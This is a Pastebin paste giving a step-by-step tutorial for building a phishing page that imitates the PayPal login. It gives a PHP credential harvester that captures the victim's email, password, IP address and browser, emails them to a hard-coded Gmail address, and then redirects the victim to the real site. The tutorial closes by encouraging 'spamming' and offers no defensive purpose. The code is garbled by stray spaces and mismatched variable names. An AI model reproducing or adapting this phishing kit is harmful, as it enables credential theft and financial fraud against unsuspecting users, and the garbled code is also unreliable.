adbaghel

Untitled

May 10th, 2019
76
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.66 KB | None | 0 0
  1. HOW TO MAKE SCAMPAGE
  2. (FREE HERE, NO NEED TO BUY TUTORIAL)
  3.  
  4.  
  5. Scam page is a fake webpage. e.g. a login of a popular website, online bank login and etc. depending on what it is. scam page are used by spammers to collect data on people who get scammed. detecting scam page is simple if you are technology oriented. but most common users can't detect scam page. this is a big problem in the www. some company are developing software to combat scam's or phishing scams - phishing is the term used
  6. for this scam.
  7.  
  8.  
  9. 1] OK, so first we choose a target.
  10. We chose www.paypal.com
  11.  
  12. 2] Navigate the site chosen. Press CTRL + S and save the file. Html somewhere on yourcomputer.
  13.  
  14. 3] We open ... There might be a problem, namely the way the image.
  15.  
  16. 4] If relative path (relative path is the path like / images / wow.gif) be transformed into an absolute path (http://tinta.com/images/wow.gif)
  17.  
  18. 5] Now that you clarified your lead you to the file. Html that was saved, so your login type CTRL + F ... (Here the words are different .. try and password, password, username, etc.. Dak login does not work).
  19.  
  20. 6] You have a code like <form action="login2.php">. Login2.php change in 040147.php!
  21.  
  22. 7] Now, the username should be a code like . name = "email" tells us that in PHP script authentication is the variable that you email username.
  23.  
  24. 8] Good memory.
  25. The password, the code should be similar ( ). So, password is held in variable password. A and memorize it.
  26.  
  27. 9] Now, where you have saved. Html, created a new file called 040147.php.
  28.  
  29. In it, add the following code:
  30. Code:
  31.  
  32. $ To = "upgoingstar@gmail.com"
  33. $ Name = $ _POST ['email'];
  34. $ Email = $ _POST ['email'];
  35. $ Subject = $ _POST ['subject'];
  36. $ Password = $ _POST ['password'];
  37. $ Agent = $ _SERVER ['HTTP_USER_AGENT'];
  38. $ Ip = $ _SERVER ['REMOTE_ADDR'];
  39. $ D = date ('l dS \ of F Y h: i: s A');
  40. $ Sub = "New Account Hacked PayPal - $ email";
  41. $ Headers = "From: $ name <$ email> \ n";
  42. $ Headers .= "Content-Type: text / plain, charset = iso-8859-1 \ n";
  43. $ Mes .= 'Username:'. $ Email. "\ N";
  44. $ Msg .= "Password:". $ Password. "\ N";
  45. $ Msg .= "Browser:". $ Agent. "\ N";
  46. $ Msg .= "IP:". $ Ip. "\ N";
  47. $ Mes .= 'Date and time:'. $ D;
  48.  
  49. (
  50. mail ($ to, $ sub, $ mes, $ headers);
  51. header ("Location: www.paypal.com");
  52.  
  53.     
  54. )
  55. ?>
  56.  
  57. 10] Modify code
  58. Code:
  59.  
  60. $ To = "flowbuzltd@gmail.com"
  61.  
  62. and put your mail. The code above variables over email and password and sends them together with some more useful details.
  63.  
  64. 11] Rename. Or HTML into index.html. Php, you upload the 2 files on a host and entertain. : Wink:
  65.  
  66.  
  67. YOUR SCAMPAGE IS READY NOW. ENJOY SPAMMING 😉
  68.  
  69. Tutorial by @mrcrackerishere
Add Comment
Please, Sign In to add comment